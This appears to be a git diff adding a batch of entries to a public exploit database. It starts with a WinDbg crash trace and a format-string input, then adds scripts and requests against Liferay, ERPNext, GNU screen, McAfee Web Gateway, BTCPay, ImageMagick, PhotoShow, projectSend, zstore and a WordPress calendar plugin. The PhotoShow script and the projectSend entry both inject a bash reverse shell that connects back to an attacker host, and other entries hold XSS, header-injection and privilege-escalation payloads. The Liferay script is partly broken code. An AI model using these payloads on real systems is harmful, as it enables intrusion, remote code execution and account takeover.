+BUCKET_ID_MODULE_STR: MSVCR120 +FAILURE_FUNCTION_NAME: _invoke_watson +BUCKET_ID_FUNCTION_STR: _invoke_watson +BUCKET_ID_OFFSET: e +BUCKET_ID_MODTIMEDATESTAMP: 577e0f1e +BUCKET_ID_MODCHECKSUM: f8aef +BUCKET_ID_MODVER_STR: 12.0.40660.0 +BUCKET_ID_PREFIX_STR: FAIL_FAST_INVALID_ARG_ +FAILURE_PROBLEM_CLASS: FAIL_FAST +FAILURE_SYMBOL_NAME: MSVCR120.dll!_invoke_watson +FAILURE_BUCKET_ID: FAIL_FAST_INVALID_ARG_c0000409_MSVCR120.dll!_invoke_watson +WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/LinkAndShareTransmitter.exe/1.1.0.2/6144495e/MSVCR120.dll/12.0.40660.0/577e0f1e/c0000409/000a46b1.htm?Retriage=1 +TARGET_TIME: 2023-01-29T15:09:52.000Z +OSBUILD: 19044 +OSSERVICEPACK: 2364 +SERVICEPACK_NUMBER: 0 +OS_REVISION: 0 +OSPLATFORM_TYPE: x86 +OSNAME: Windows 10 +OSEDITION: Windows 10 WinNt SingleUserTS Personal +USER_LCID: 0 +OSBUILD_TIMESTAMP: 2008-01-07 11:33:18 +BUILDDATESTAMP_STR: 160101.0800 +BUILDLAB_STR: WinBuild +BUILDOSVER_STR: 10.0.19041.2364 +ANALYSIS_SESSION_ELAPSED_TIME: 635d +ANALYSIS_SOURCE: UM +FAILURE_ID_HASH_STRING: um:fail_fast_invalid_arg_c0000409_msvcr120.dll!_invoke_watson +FAILURE_ID_HASH: {c9fee478-4ed1-0d2b-ddd7-dca655d9817f} + +Followup: MachineOwner +--------- + +0:000> d MSVCP120 +70fb0000 4d 5a 90 00 03 00 00 00-04 00 00 00 ff ff 00 00 MZ.............. +70fb0010 b8 00 00 00 00 00 00 00-40 00 00 00 00 00 00 00 ........@....... +70fb0020 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +70fb0030 00 00 00 00 00 00 00 00-00 00 00 00 f8 00 00 00 ................ +70fb0040 0e 1f ba 0e 00 b4 09 cd-21 b8 01 4c cd 21 54 68 ........!..L.!Th +70fb0050 69 73 20 70 72 6f 67 72-61 6d 20 63 61 6e 6e 6f is program canno +70fb0060 74 20 62 65 20 72 75 6e-20 69 6e 20 44 4f 53 20 t be run in DOS +70fb0070 6d 6f 64 65 2e 0d 0d 0a-24 00 00 00 00 00 00 00 mode....$....... +0:000> lmvm MSVCR120 +Browse full module list +start end module name +64460000 6454e000 MSVCR120 (private pdb symbols) C:\ProgramData\dbg\sym\msvcr120.i386.pdb\4D11E607E50346DDAB0C2C4FFC8716112\msvcr120.i386.pdb + Loaded symbol image file: C:\WINDOWS\SYSTEM32\MSVCR120.dll + Image path: C:\WINDOWS\SysWOW64\MSVCR120.dll + Image name: MSVCR120.dll + Browse all global symbols functions data + Timestamp: Thu Jul 7 10:13:18 2016 (577E0F1E) + CheckSum: 000F8AEF + ImageSize: 000EE000 + File version: 12.0.40660.0 + Product version: 12.0.40660.0 + File flags: 0 (Mask 3F) + File OS: 4 Unknown Win32 + File type: 2.0 Dll + File date: 00000000.00000000 + Translations: 0409.04b0 + CompanyName: Microsoft Corporation + ProductName: Microsoft® Visual Studio® 2013 + InternalName: msvcr120.dll + OriginalFilename: msvcr120.dll + ProductVersion: 12.00.40660.0 + FileVersion: 12.00.40660.0 built by: VSULDR + FileDescription: Microsoft® C Runtime Library + LegalCopyright: © Microsoft Corporation. All rights reserved. +0:000> x /D /f MSVCR120!getenv + MSVCR120!getenv (char *) +0:000> x /D /f MSVCR120!getenv +64477785 MSVCR120!getenv (char *) +.. +0:000> u 64477785 +MSVCR120!getenv [f:\dd\vctools\crt\crtw32\misc\getenv.c @ 75]: +64477785 6a0c push 0Ch +64477787 68f0774764 push offset MSVCR120!_CT??_R0?AVbad_caststd+0x66c (644777f0) +6447778c e8ea75ffff call MSVCR120!__SEH_prolog4 (6446ed7b) +64477791 8365e400 and dword ptr [ebp-1Ch],0 +64477795 33c0 xor eax,eax +64477797 8b7508 mov esi,dword ptr [ebp+8] +6447779a 85f6 test esi,esi +6447779c 0f95c0 setne al +0:000> r +eax=00000001 ebx=00000000 ecx=00000005 edx=000001e9 esi=0119f36f edi=00000000 +eip=645046b1 esp=0119f0b8 ebp=0119f0d0 iopl=0 nv up ei pl nz na po nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202 +MSVCR120!_invoke_watson+0xe: +645046b1 cd29 int 29h +0:000> u 645046b1 +MSVCR120!_invoke_watson+0xe [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 132]: +645046b1 cd29 int 29h +645046b3 56 push esi +645046b4 6a01 push 1 +645046b6 be170400c0 mov esi,0C0000417h +645046bb 56 push esi +645046bc 6a02 push 2 +645046be e85efeffff call MSVCR120!_call_reportfault (64504521) +645046c3 56 push esi +0:000> u 64477785 +MSVCR120!getenv [f:\dd\vctools\crt\crtw32\misc\getenv.c @ 75]: +64477785 6a0c push 0Ch +64477787 68f0774764 push offset MSVCR120!_CT??_R0?AVbad_caststd+0x66c (644777f0) +6447778c e8ea75ffff call MSVCR120!__SEH_prolog4 (6446ed7b) +64477791 8365e400 and dword ptr [ebp-1Ch],0 +64477795 33c0 xor eax,eax +64477797 8b7508 mov esi,dword ptr [ebp+8] +6447779a 85f6 test esi,esi +6447779c 0f95c0 setne al +0:000> g +WARNING: Continuing a non-continuable exception +(4224.59e8): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!) +eax=00000001 ebx=00000000 ecx=00000005 edx=000001e9 esi=0119f36f edi=00000000 +eip=645046b1 esp=0119f0b8 ebp=0119f0d0 iopl=0 nv up ei pl nz na po nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202 +MSVCR120!_invoke_watson+0xe: +645046b1 cd29 int 29h + + +--- + + +C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>set username=%a.%b.%c.%d.%e.%f.%g.%h.%x.AAAAAAAAAAAAAA.%x.BBBAAAAAAAA=%p=AAAAA.%xAAAAA +C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>LinkAndShareTransmitter.exe + +C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>02/02/23 17:11:44 : : Internal Error: can not replace file with temp file +02/02/23 17:11:44 : Background launch: User: 0x1.7474b0p-1019.b. +.1897752.3.147818e+267.1445459053534108500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000.000000.1.36157e+267..0.AAAAAAAAAAAAAA.1cf784.BBBAAAAAAAA=7770C59F=AAAAA.47c778AAAAA \ No newline at end of file diff --git a/exploits/java/webapps/51244.py b/exploits/java/webapps/51244.py new file mode 100755 index 000000000..dfad59e8c --- /dev/null +++ b/exploits/java/webapps/51244.py @@ -0,0 +1,30 @@ +# Exploit Title: Liferay Portal 6.2.5 - Insecure Permissions +# Google Dork: -inurl:/html/js/editor/ckeditor/editor/filemanager/browser/ +# Date: 2021/05 +# Exploit Author: fu2x2000 +# Version: Liferay Portal 6.2.5 or later +# CVE : CVE-2021-33990 + + import requests +import json + +print (" Search this on Google #Dork for liferay +-inurl:/html/js/editor/ckeditor/editor/filemanager/browser/") + +url ="URL Goes Here +/html/js/editor/ckeditor/editor/filemanager/browser/liferay/frmfolders.html" +req = requests.get(url) +print req +sta = req.status_code +if sta == 200: +print ('Life Vulnerability exists') +cook = url +print cook +inject = "Command=FileUpload&Type=File&CurrentFolder=/" +#cook_inject = cook+inject +#print cook_inject +else: +print ('not found try a another method') + + +print ("solution restrict access and user groups") \ No newline at end of file diff --git a/exploits/java/webapps/51255.txt b/exploits/java/webapps/51255.txt new file mode 100644 index 000000000..6adfae32e --- /dev/null +++ b/exploits/java/webapps/51255.txt @@ -0,0 +1,24 @@ +# Exploit Title: ERPNext 12.29 - Cross-Site Scripting (XSS) +# Date: 7 Feb 2023 +# Exploit Author: Patrick Dean Ramos / Nathu Nandwani / Junnair Manla +#Github - https://github.com/patrickdeanramos/CVE-2022-28598 +# Vendor Homepage: https://erpnext.com/ +# Version: 12.29 +# CVE-2022-28598 + +Summary: Stored cross-site scripting (XSS) vulnerability was found in ERPNext 12.29 where the +"last_known_version" field found in the "My Setting" page in ERPNext +12.29.0 allows remote attackers to inject arbitrary web script or HTML via +a crafted site name by doing an authenticated POST HTTP request to +'/desk#Form/User/(Authenticated User)' and inject the script in the +'last_known_version' field where we are able to view the script by +clicking the 'pdf' view form. + +This vulnerability is specifically the "last_known_version" field found +under the 'My Settings' where we need to first save the my settings. + +1. Login as any user +2. Under the ‘last_known_version’ field we are going to inject our +malicious script. +3. To view our injected script we need to click the view pdf page, and as +seen below we have successfully injected our script. \ No newline at end of file diff --git a/exploits/linux/local/51252.py b/exploits/linux/local/51252.py new file mode 100755 index 000000000..0e616fb7a --- /dev/null +++ b/exploits/linux/local/51252.py @@ -0,0 +1,105 @@ +# Exploit Title: GNU screen v4.9.0 - Privilege Escalation +# Date: 03.02.2023 +# Exploit Author: Manuel Andreas +# Vendor Homepage: https://www.gnu.org/software/screen/ +# Software Link: https://ftp.gnu.org/gnu/screen/screen-4.9.0.tar.gz +# Version: 4.9.0 +# Tested on: Arch Linux +# CVE : CVE-2023-24626 + +import os +import socket +import struct +import argparse +import subprocess +import pty +import time + +SOCKDIR_TEMPLATE = "/run/screens/S-{}" +MAXPATHLEN = 4096 +MAXTERMLEN = 32 +MAXLOGINLEN = 256 +STRUCTSIZE = 12584 +MSG_QUERY = 9 + +def find_latest_socket(dir): + return f"{dir}/{sorted(os.listdir(dir))[-1]}" + + +def build_magic(ver=5): + return ord('m') << 24 | ord('s') << 16 | ord('g') << 8 | ver + + +def build_msg(type): + return struct.pack(" + + + + + + McAfee Web Gateway - Notification + + + +------------------------------------------------------------------------ + +Static content is loaded from URL paths prefixed with +"/mwg-internal/de5fs23hu73ds/". It was discovered that paths with this +prefix are intercepted and directly handled by the SWG no matter on +which domain they are accessed. While the prefix can be configured in +the SWG, attackers can also obtain it using another currently +undisclosed vulnerability. + +By reverse engineering the file "libSsos.so" and analysing JavaScript +code, it was possible to derive the API of the "Ssos" plugin's +"SetLoginToken" action. Through the following call using the +command-line HTTP client curl, the behaviour of the plugin was further +analysed: + +------------------------------------------------------------------------ +$ curl --proxy http://192.168.1.1:8080 -i 'https://gateway.example.com/mwg-internal/de5fs23hu73ds/plugin?target=Ssos&action=SetLoginToken&v=v&c=c&p=p' +HTTP/1.0 200 OK +P3P: p +Connection: Keep-Alive +Set-Cookie: MwgSso=v; Path=/; Max-Age=240; +Content-Type: application/javascript +Content-Length: 2 +X-Frame-Options: deny + +c; +------------------------------------------------------------------------ + +The response embeds the values of the three URL parameters "v", "c" and +"p". The value for "p" is embedded as value of the "P3P" header, the +value of "c" as the response body and the value of "v" as the value +of the cookie "MwgSso". + +It is also possible to include newline or carriage return characters in +the parameter value which are not encoded in the output. Consequently, +if the value of the parameter "p" contains a line break, arbitrary +headers can be injected. If two line breaks follow, an arbitrary body +can be injected. If a suitable "Content-Length" header is injected, the +remaining headers and body of the original response will be ignored by +the browser. This means that apart from the initial "P3P" header, an +arbitrary response can be generated. For example, a page containing +JavaScript code could be returned, resulting in a cross-site scripting +attack. + +Consequently, attackers can construct URL paths that can be appended to +any domain and cause an arbitrary response to be returned if the URL is +accessed through the SWG. This could be exploited by distributing such +URLs or even by offering a website which performs an automatic redirect +to any other website using such a URL. As a result, the SWG exposes its +users to self-induced cross-site scripting vulnerabilities in any +website. + + +Proof of Concept +================ + +In the following request, the "p" parameter is used to inject suitable +"Content-Type" and "Content-Length" headers, as well as an arbitrary +HTML response body. + +------------------------------------------------------------------------ +$ curl --proxy http://192.168.1.1:8080 'https://gateway.example.com/mwg-internal/de5fs23hu73ds/plugin?target=Ssos&action=SetLoginToken&v=v&c=c&p=p%0aContent-Type: text/html%0aContent-Length: 27%0a%0a

RedTeam Pentesting

' +HTTP/1.0 200 OK +P3P: p +Content-Type: text/html +Content-Length: 27 + +

RedTeam Pentesting

+------------------------------------------------------------------------ + +As mentioned above, the HTTP response body could also include JavaScript +code designed to interact with the domain specified in the URL resulting +in a cross-site scripting vulnerability. + + +Workaround +========== + +None. + + +Fix +=== + +According to the vendor, the vulnerability is mitigated in versions +10.2.17, 11.2.6 and 12.0.1 of the Secure Web Gateway. This was not +verified by RedTeam Pentesting GmbH. The vendor's security bulletin can +be found at the following URL: + +https://kcm.trellix.com/corporate/index?page=content&id=SB10393 + + +Security Risk +============= + +The vulnerability could be used to perform cross-site scripting attacks +against users of the SWG in context of any domain. Attackers only need +to convince users to open a prepared URL or visit an attacker's website +that could perform an automatic redirect to an exploit URL. This exposes +any website visited through the SWG to the various risks and +consequences of a cross-site scripting vulnerability such as account +takeover. As a result, this vulnerability poses a high risk. + + +Timeline +======== + +2022-07-29 Vulnerability identified +2022-10-20 Customer approved disclosure to vendor +2022-10-20 Vulnerability was disclosed to the vendor +2023-01-17 Patch released by vendor for versions 10.2.17, 11.2.6 and + 12.0.1. +2023-01-26 Detailed advisory released by RedTeam Pentesting GmbH + +RedTeam Pentesting GmbH +======================= + +RedTeam Pentesting offers individual penetration tests performed by a +team of specialised IT-security experts. Hereby, security weaknesses in +company networks or products are uncovered and can be fixed immediately. + +As there are only few experts in this field, RedTeam Pentesting wants to +share its knowledge and enhance the public knowledge with research in +security-related areas. The results are made available as public +security advisories. + +More information about RedTeam Pentesting can be found at: +https://www.redteam-pentesting.de/ + + +Working at RedTeam Pentesting +============================= + +RedTeam Pentesting is looking for penetration testers to join our team +in Aachen, Germany. If you are interested please visit: +https://jobs.redteam-pentesting.de/ + +-- +RedTeam Pentesting GmbH Tel.: +49 241 510081-0 +Alter Posthof 1 Fax : +49 241 510081-99 +52062 Aachen https://www.redteam-pentesting.de +Germany Registergericht: Aachen HRB 14004 +Geschäftsführer: Patrick Hof, Jens Liebchen \ No newline at end of file diff --git a/exploits/multiple/webapps/51254.txt b/exploits/multiple/webapps/51254.txt new file mode 100644 index 000000000..4bb4eb2f1 --- /dev/null +++ b/exploits/multiple/webapps/51254.txt @@ -0,0 +1,29 @@ +# Exploit Title: BTCPay Server v1.7.4 - HTML Injection +# Date: 01/26/2023 +# Exploit Author: Manojkumar J (TheWhiteEvil) +# Vendor Homepage: https://github.com/btcpayserver/btcpayserver +# Software Link: +https://github.com/btcpayserver/btcpayserver/releases/tag/v1.7.5 +# Version: <=1.7.4 +# Tested on: Windows10 +# CVE : CVE-2023-0493 + +# Description: + +BTCPay Server v1.7.4 HTML injection vulnerability. + +# Steps to exploit: + +1. Create an account on the target website. + +Register endpoint: https://target-website.com/register# + +2. Move on to the API key and create API key with the html injection in the +label field. + +Example: + +clickhere + + +3. Click remove/delete API key, the html injection will render. \ No newline at end of file diff --git a/exploits/multiple/webapps/51264.txt b/exploits/multiple/webapps/51264.txt new file mode 100644 index 000000000..f43e7ffb3 --- /dev/null +++ b/exploits/multiple/webapps/51264.txt @@ -0,0 +1,9 @@ +# Exploit Title: Provide Server v.14.4 XSS - CSRF & Remote Code Execution (RCE) +# Date: 2023-02-10 +# Exploit Author: Andreas Finstad +# Version: < 14.4.1.29 +# Tested on: Windows Server 2022 +# CVE : CVE-2023-23286 +POC: + +https://f20.be/blog/provide-server-14-4 \ No newline at end of file diff --git a/exploits/php/dos/51256.txt b/exploits/php/dos/51256.txt new file mode 100644 index 000000000..b6d70e55f --- /dev/null +++ b/exploits/php/dos/51256.txt @@ -0,0 +1,39 @@ +## Exploit Title: ImageMagick 7.1.0-49 - DoS +## Author: nu11secur1ty +## Date: 02.07.2023 +## Vendor: https://imagemagick.org/ +## Software: https://imagemagick.en.uptodown.com/windows/download/82953605 +## Reference: https://portswigger.net/daily-swig/denial-of-service +## CVE-ID: CVE-2022-44267 + +## Description: +ImageMagick 7.1.0-49 is vulnerable to Denial of Service. +When it parses a PNG image (e.g., for resize), the convert process +could be left waiting for stdin input. +The attacker can easily send a malicious png file to the victim and +then when the victim has opened this png he will crash the program. + +STATUS: HIGH Vulnerability + +[+]Payload: +[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-44267/PoC) + +## Reproduce: +[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-44267) + +## Proof and Exploit: +[href](https://streamable.com/l7z79c) + +## Time spend: +00:30:00 + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstormsecurity.com/ +https://cve.mitre.org/index.html +https://cxsecurity.com/ and https://www.exploit-db.com/ +0day Exploit DataBase https://0day.today/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty \ No newline at end of file diff --git a/exploits/php/webapps/51236.py b/exploits/php/webapps/51236.py new file mode 100755 index 000000000..19a98b095 --- /dev/null +++ b/exploits/php/webapps/51236.py @@ -0,0 +1,93 @@ +# Exploit Title: PhotoShow 3.0 - Remote Code Execution +# Date: January 11, 2023 +# Exploit Author: LSCP Responsible Disclosure Lab +# Detailed Bug Description: https://lscp.llc/index.php/2021/07/19/how-white-box-hacking-works-remote-code-execution-and-stored-xss-in-photoshow-3-0/ +# Vendor Homepage: https://github.com/thibaud-rohmer +# Software Link: https://github.com/thibaud-rohmer/PhotoShow +# Version: 3.0 +# Tested on: Ubuntu 20.04 LTS + +# creds of a user with admin privileges required + +import sys +import requests +import base64 +import urllib.parse + + +if(len(sys.argv)!=6): + print('Usage: \n\tpython3 ' + sys.argv[0] + ' "login" ' + + '"password" "target_ip" "attacker_ip" "attacker_nc_port"') + quit() + +login=sys.argv[1] +password=sys.argv[2] +targetIp = sys.argv[3] +attackerIp = sys.argv[4] +attackerNcPort = sys.argv[5] + + +def main(): + session = requests.Session() + #login as admin user + logInSession(session, targetIp, login, password) + #change application behaviour for handling .mp4 video + uploadExpoit(session, targetIp, attackerIp, attackerNcPort) + #send the shell to attaker's nc by uploading .mp4 video + sendMP4Video(session, targetIp) + print("Check your netcat") + +def logInSession(session, targetIp, login, password): + session.headers.update({'Content-Type' : "application/x-www-form-urlencoded"}) + data = "login="+login+"&password="+password + url = "http://"+targetIp+"/?t=Login" + response= session.post(url, data=data) + phpsessid=response.headers.get("Set-Cookie").split(";")[0] + session.headers.update({'Cookie' : phpsessid}) + + +def uploadExpoit(session, targetIp, attackerIp, attackerNcPort): + exiftranPathInjection=createInjection(attackerIp, attackerNcPort) + url = "http://"+targetIp+"/?t=Adm&a=Set" + data = "name=PhotoShow&site_address=&loc=default.ini&user_theme=Default&" \ + + "rss=on&max_comments=50&thumbs_size=200&fbappid=&ffmpeg_path=&encode_video=on&"\ + + "ffmpeg_option=-threads+4+-vcodec+libx264+-acodec+libfdk_aac&rotate_image=on&"\ + + exiftranPathInjection + session.post(url, data=data).content.decode('utf8') + + +def createInjection(attakerIp, attackerNcPort): + textToEncode = "bash -i >& /dev/tcp/"+attackerIp+"/"+attackerNcPort+" 0>&1" + b64Encoded = base64.b64encode(textToEncode.encode("ascii")) + strb64 = str(b64Encoded) + strb64 = strb64[2:len(strb64)-1] + injection = {"exiftran_path":"echo "+ strb64 +" | base64 -d > /tmp/1.sh ;/bin/bash /tmp/1.sh"} + return urllib.parse.urlencode(injection) + +def sendMP4Video(session, targetIp): + session.headers.update({'Content-Type' : "multipart/form-data; "\ + +"boundary=---------------------------752343701418612422363028651"}) + url = "http://"+targetIp+"/?a=Upl" + data = """-----------------------------752343701418612422363028651\r +Content-Disposition: form-data; name="path"\r +\r +\r +-----------------------------752343701418612422363028651\r +Content-Disposition: form-data; name="inherit"\r +\r +1\r +-----------------------------752343701418612422363028651\r +Content-Disposition: form-data; name="images[]"; filename="a.mp4"\r +Content-Type: video/mp4\r +\r +a\r +-----------------------------752343701418612422363028651--\r +""" + try: + session.post(url, data=data, timeout=0.001) + except requests.exceptions.ReadTimeout: + pass + + +if __name__ =="__main__": + main() \ No newline at end of file diff --git a/exploits/php/webapps/51238.txt b/exploits/php/webapps/51238.txt new file mode 100644 index 000000000..537e1aa77 --- /dev/null +++ b/exploits/php/webapps/51238.txt @@ -0,0 +1,132 @@ +Exploit Title: projectSend r1605 - Remote Code Exectution RCE +Application: projectSend +Version: r1605 +Bugs: rce via file extension manipulation +Technology: PHP +Vendor URL: https://www.projectsend.org/ +Software Link: https://www.projectsend.org/ +Date of found: 26-01-2023 +Author: Mirabbas Ağalarov +Tested on: Linux +POC video: https://youtu.be/Ln7KluDfnk4 + +2. Technical Details & POC +======================================== + +1.The attacker first creates a txt file and pastes the following code. Next, the Attacker changes the file extension to jpg. Because the system php,sh,exe etc. It does not allow files. + +bash -i >& /dev/tcp/192.168.100.18/4444 0>&1 + +2.Then the attacker starts listening for ip and port + nc -lvp 4444 + +3.and when uploading file it makes http request as below.file name should be like this openme.sh;jpg + + + +POST /includes/upload.process.php HTTP/1.1 +Host: localhost +Content-Length: 525 +sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" +sec-ch-ua-platform: "Linux" +sec-ch-ua-mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0enbZuQQAtahFVjI +Accept: */* +Origin: http://localhost +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: http://localhost/upload.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: download_started=false; PHPSESSID=jtk7d0nats7nb1r5rjm7a6kj59 +Connection: close + +------WebKitFormBoundary0enbZuQQAtahFVjI +Content-Disposition: form-data; name="name" + +openme.sh;jpg +------WebKitFormBoundary0enbZuQQAtahFVjI +Content-Disposition: form-data; name="chunk" + +0 +------WebKitFormBoundary0enbZuQQAtahFVjI +Content-Disposition: form-data; name="chunks" + +1 +------WebKitFormBoundary0enbZuQQAtahFVjI +Content-Disposition: form-data; name="file"; filename="blob" +Content-Type: application/octet-stream + +bash -i >& /dev/tcp/192.168.100.18/4444 0>&1 + +------WebKitFormBoundary0enbZuQQAtahFVjI-- + + +4.In the second request, we do this to the filename section at the bottom. + +openme.sh + + +POST /files-edit.php?ids=34 HTTP/1.1 +Host: localhost +Content-Length: 1016 +Cache-Control: max-age=0 +sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "Linux" +Upgrade-Insecure-Requests: 1 +Origin: http://localhost +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryc8btjvyb3An7HcmA +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: http://localhost/files-edit.php?ids=34&type=new +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: download_started=false; PHPSESSID=jtk7d0nats7nb1r5rjm7a6kj59 +Connection: close + +------WebKitFormBoundaryc8btjvyb3An7HcmA +Content-Disposition: form-data; name="csrf_token" + +66540808a4bd64c0f0566e6c20a4bc36c49dfac41172788424c6924b15b18d02 +------WebKitFormBoundaryc8btjvyb3An7HcmA +Content-Disposition: form-data; name="file[1][id]" + +34 +------WebKitFormBoundaryc8btjvyb3An7HcmA +Content-Disposition: form-data; name="file[1][original]" + +openme.sh;.jpg +------WebKitFormBoundaryc8btjvyb3An7HcmA +Content-Disposition: form-data; name="file[1][file]" + +1674759035-52e51cf3f58377b8a687d49b960a58dfc677f0ad-openmesh.jpg +------WebKitFormBoundaryc8btjvyb3An7HcmA +Content-Disposition: form-data; name="file[1][name]" + +openme.sh +------WebKitFormBoundaryc8btjvyb3An7HcmA +Content-Disposition: form-data; name="file[1][description]" + + +------WebKitFormBoundaryc8btjvyb3An7HcmA +Content-Disposition: form-data; name="file[1][expiry_date]" + +25-02-2023 +------WebKitFormBoundaryc8btjvyb3An7HcmA +Content-Disposition: form-data; name="save" + + +------WebKitFormBoundaryc8btjvyb3An7HcmA-- + + +And it doesn't matter who downloads your file. if it opens then reverse shell will be triggered and rce + + +private youtube video poc : https://youtu.be/Ln7KluDfnk4 \ No newline at end of file diff --git a/exploits/php/webapps/51240.txt b/exploits/php/webapps/51240.txt new file mode 100644 index 000000000..b90f43dbb --- /dev/null +++ b/exploits/php/webapps/51240.txt @@ -0,0 +1,76 @@ +## Exploit Title: zstore 6.6.0 - Cross-Site Scripting (XSS) +## Development: nu11secur1ty +## Date: 01.29.2023 +## Vendor: https://zippy.com.ua/ +## Software: https://github.com/leon-mbs/zstore/releases/tag/6.5.4 +## Reproduce: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/zippy/zstore-6.5.4 + +## Description: +The value of manual insertion `point 1` is copied into the HTML +document as plain text between tags. +The payload giflcc0yu0 was submitted in +the manual insertion point 1. +This input was echoed unmodified in the application's response. + + +## STATUS: HIGH Vulnerability + +[+] Exploit: +```GET +GET /index.php?p=%41%70%70%2f%50%61%67%65%73%2f%43%68%61%74%67%69%66%6c%63%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%77%77%77%2e%79%6f%75%74%75%62%65%2e%63%6f%6d%2f%77%61%74%63%68%3f%76%3d%6d%68%45%76%56%39%51%37%7a%66%45%22%3e%3c%69%6d%67%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%6d%65%64%69%61%2e%74%65%6e%6f%72%2e%63%6f%6d%2f%2d%4b%39%73%48%78%58%41%62%2d%63%41%41%41%41%43%2f%73%68%61%6d%65%2d%6f%6e%2d%79%6f%75%2d%70%61%74%72%69%63%69%61%2e%67%69%66%22%3e%0a +HTTP/2 +Host: store.zippy.com.ua +Cookie: PHPSESSID=f816ed0ddb0c43828cb387f992ac8521; last_chat_id=439 +Cache-Control: max-age=0 +Sec-Ch-Ua: "Chromium";v="107", "Not=A?Brand";v="24" +Sec-Ch-Ua-Mobile: ?0 +Sec-Ch-Ua-Platform: "Windows" +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) +AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 +Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: https://store.zippy.com.ua/index.php?q=p:App/Pages/Main +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +``` + +[+] Response: +``` +HTTP/2 200 OK +Server: nginx +Date: Sun, 29 Jan 2023 07:27:55 GMT +Content-Type: text/html; charset=UTF-8 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +X-Ray: p529:0.010/wn19119:0.010/wa19119:D=12546 + +Class \App\Pages\Chatgiflc + does not exist
82
/home/zippy00/zippy.com.ua/store/vendor/leon-mbs/zippy/core/webapplication.php
+``` + + +## Proof and Exploit: +[href](https://streamable.com/aadj5c) + +## Reference: +[href](https://portswigger.net/kb/issues/00200300_cross-site-scripting-reflected) + + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstormsecurity.com/ +https://cve.mitre.org/index.html +https://cxsecurity.com/ and https://www.exploit-db.com/ +0day Exploit DataBase https://0day.today/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty \ No newline at end of file diff --git a/exploits/php/webapps/51241.txt b/exploits/php/webapps/51241.txt new file mode 100644 index 000000000..3b7d8cc55 --- /dev/null +++ b/exploits/php/webapps/51241.txt @@ -0,0 +1,51 @@ +# Exploit Title: Calendar Event Multi View 1.4.07 - Unauthenticated Arbitrary Event Creation to Cross-Site Scripting (XSS) +# Date: 2022-05-25 +# Exploit Author: Mostafa Farzaneh +# WPScan page: +https://wpscan.com/vulnerability/95f92062-08ce-478a-a2bc-6d026adf657c +# Vendor Homepage: https://wordpress.org/plugins/cp-multi-view-calendar/ +# Software Link: +https://downloads.wordpress.org/plugin/cp-multi-view-calendar.1.4.06.zip +# Version: 1.4.06 +# Tested on: Linux +# CVE : CVE-2022-2846 +# Description: +The Calendar Event Multi View WordPress plugin before 1.4.07 does not have +any authorisation and CSRF checks in place when creating an event, and is +also lacking sanitisation as well as escaping in some of the event fields. +This could allow unauthenticated attackers to create arbitrary events and +put Cross-Site Scripting payloads in it. + +#POC and exploit code: +As an unauthenticated user, to add a malicious event (on October 6th, 2022) +to the calendar with ID 1, open the code below + + + +
+ + + + + + + + + + + + + + + + + +
